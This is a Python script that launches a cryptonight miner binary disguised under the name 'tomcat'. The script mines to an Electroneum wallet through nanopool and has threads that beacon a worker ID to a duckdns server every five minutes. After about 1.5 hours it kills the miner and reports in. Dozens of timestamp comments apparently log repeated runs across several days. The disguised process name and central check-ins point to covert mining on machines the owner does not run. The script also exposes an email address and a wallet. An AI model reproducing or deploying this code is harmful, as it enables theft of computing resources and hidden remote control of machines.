import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:04:04.792984
#2018-02-17 16:50:07.467235
#2018-02-17 18:38:07.143643
#2018-02-17 20:26:04.116239
#2018-02-17 22:12:07.418279
#2018-02-17 23:56:06.781051
#2018-02-18 01:47:04.326960
#2018-02-18 03:34:05.722538
#2018-02-18 05:22:06.839545
#2018-02-18 07:13:05.972247
#2018-02-18 09:01:05.106846
#2018-02-18 10:48:01.382964
#2018-02-18 12:36:01.854888
#2018-02-18 14:22:04.544613
#2018-02-18 16:12:06.764418
#2018-02-18 18:00:09.310118
#2018-02-18 19:46:06.347923
#2018-02-18 21:33:04.660466
#2018-02-18 23:22:01.474199
#2018-02-19 01:09:06.206401
#2018-02-19 02:55:04.589223
#2018-02-19 04:42:05.583061
#2018-02-19 06:26:07.130404
#2018-02-19 08:16:05.039523
#2018-02-19 10:05:10.312989
#2018-02-19 11:54:05.217590
#2018-02-19 13:41:05.515899
#2018-02-19 15:28:06.228843
#2018-02-19 17:15:07.732423
#2018-02-19 19:03:05.576007
#2018-02-19 20:49:02.191541
#2018-02-19 22:36:08.537715
#2018-02-20 00:22:06.777762
#2018-02-20 02:10:09.083065
#2018-02-20 04:01:05.709405
#2018-02-20 05:45:11.309206
#2018-02-20 07:30:07.925919
#2018-02-20 09:14:06.255302
#2018-02-20 10:57:06.876784
#2018-02-20 12:44:09.252184
#2018-02-20 14:29:07.378671
#2018-02-20 16:13:12.093881
#2018-02-20 18:01:07.538364
#2018-02-20 19:52:01.838762
#2018-02-20 21:39:08.767920
#2018-02-20 23:20:07.491272
#2018-02-21 01:06:06.944095
#2018-02-21 02:53:04.658854
#2018-02-21 04:42:05.653196
#2018-02-21 06:30:01.508280
#2018-02-21 08:15:02.639247
#2018-02-21 10:03:04.395467
#2018-02-21 11:52:06.394145
#2018-02-21 13:42:07.668441
#2018-02-21 15:26:06.407955
#2018-02-21 17:16:08.137239
#2018-02-21 19:04:03.120292
#2018-02-21 20:52:06.930052
#2018-02-21 22:37:01.831910
#2018-02-22 00:27:06.664507
#2018-02-22 02:14:07.625749
#2018-02-22 04:01:04.668631
#2018-02-22 05:47:05.046659
#2018-02-22 07:34:06.689906
#2018-02-22 09:22:06.168169
#2018-02-22 11:08:07.189091
#2018-02-22 12:54:01.944852
#2018-02-22 14:41:09.212965
#2018-02-22 16:27:05.658312
#2018-02-22 18:13:06.629132
#2018-02-22 20:04:01.911040
#2018-02-22 21:53:05.993674
#2018-02-22 23:41:08.194822
#2018-02-23 01:28:07.821468
#2018-02-23 03:16:05.472797
#2018-02-23 05:02:06.879085
#2018-02-23 06:48:04.840587
#2018-02-23 08:37:06.166997
#2018-02-23 10:52:08.897814
#2018-02-23 12:49:06.759122
#2018-02-23 14:33:03.915660
#2018-02-23 16:22:05.220198
#2018-02-23 18:08:04.023297
#2018-02-23 19:53:05.005065
#2018-02-23 21:36:07.751065
#2018-02-23 23:23:05.222233
#2018-02-24 01:16:03.975430
#2018-02-24 03:06:07.226827
#2018-02-24 04:52:07.133525
#2018-02-24 06:38:06.489234
#2018-02-24 08:28:06.582212
#2018-02-24 10:14:01.599198
#2018-02-24 12:08:03.610639
#2018-02-24 13:55:01.783799
#2018-02-24 15:36:05.687475
#2018-02-24 17:31:05.926021
#2018-02-24 19:17:05.314638
#2018-02-24 21:06:04.543421
#2018-02-24 23:39:03.842535
#2018-02-25 02:59:05.039123
#2018-02-25 07:06:07.009228